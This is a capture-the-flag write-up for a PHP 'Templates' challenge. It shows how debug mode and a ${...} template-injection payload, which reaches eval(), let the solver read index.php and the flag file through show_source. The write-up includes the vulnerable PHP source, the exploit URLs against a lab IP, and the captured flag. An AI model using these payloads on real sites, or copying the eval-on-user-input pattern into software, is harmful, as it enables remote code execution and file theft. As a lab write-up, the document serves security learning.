Challenge Description

We need a developer to make a small debug on our application.

Flag format: UNR{}

Flag proof

UNR{26ym3y-aqqqep-idhz4s-boxxwi-o5enrq-tpviyj-sp5wjw-dszds3}

Summary

Using template RCE, show the contents of the flag file.

Details

After opening up the website, we get this page:

The challenge mentions something about debug, so we enable debug mode using: http://35.198.93.134:30918/?err=Maintance+Mode+On&debug=true . This gives us the following error: Notice**: Undefined variable: lol in **/var/www/html/index.php** on line **20 which confirms the fact that the debugging works.

The title alludes to template injection, so we try:

Template injection: http://35.198.93.134:30918/?err=${{1+1}}&debug This gives us the error:

Notice: Undefined variable: lol in /var/www/html/index.php on line 20

Parse error: syntax error, unexpected '{', expecting ';' in /var/www/html/index.php(24) : eval()'d code on line 1

We then try using only one of "{" and "}" and we try to see the source of "index.php" to see the code we are working with.

source -> http://35.198.93.134:30918/?err=;${show_source("index.php")};&debug

 <?php

// disable errors by default
ini_set('display_startup_errors', 0);
ini_set('display_errors', 0);
error_reporting(0);

// enable errors if debug param is sent
if (isset($_GET['debug'])) {
    ini_set('display_startup_errors', 1);
    ini_set('display_errors', 1);
    error_reporting(-1);
}

if (!isset($_GET['err'])) {
    header('Location: /?err=Maintance+Mode+On');
    exit;
}

$err = $_GET['err'] . $lol;
$err = preg_replace_callback(
    '/\\$\\{([^\\}]+)\\}/',
    function($match) {
        $var = eval("return $match[1];");
        return ${$var};
    },
    $err);
$err = htmlspecialchars($err);
?>

<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <meta name="referrer" content="origin-when-crossorigin">
    <meta name="viewport" content="width=device-width,initial-scale=1">
    <meta name="author" content="<https://twitter.com/nytr0gen_>">

    <title>Templates</title>
    <style>
       body {
           background: #222;
           color: #ccc;
        }
        .main {
            margin: 0 auto;
            width: 400px;
            height: 400px;
            margin-top: 40px;
            border: 6px solid #55f;
            border-radius: 6px;
            padding: 10px;
        }
    </style>
</head>
<body>
    <div class="main">
        <?=$err?>
    </div>
</body>
</html>

After testing out different names for the flag file, we finally end up with the correct one which was called flag. To display its contents we run show_source("flag"). So, the URL is: http://35.198.93.134:30918/?err=${show_source("flag")}&debug

and we get: UNR{26ym3y-aqqqep-idhz4s-boxxwi-o5enrq-tpviyj-sp5wjw-dszds3}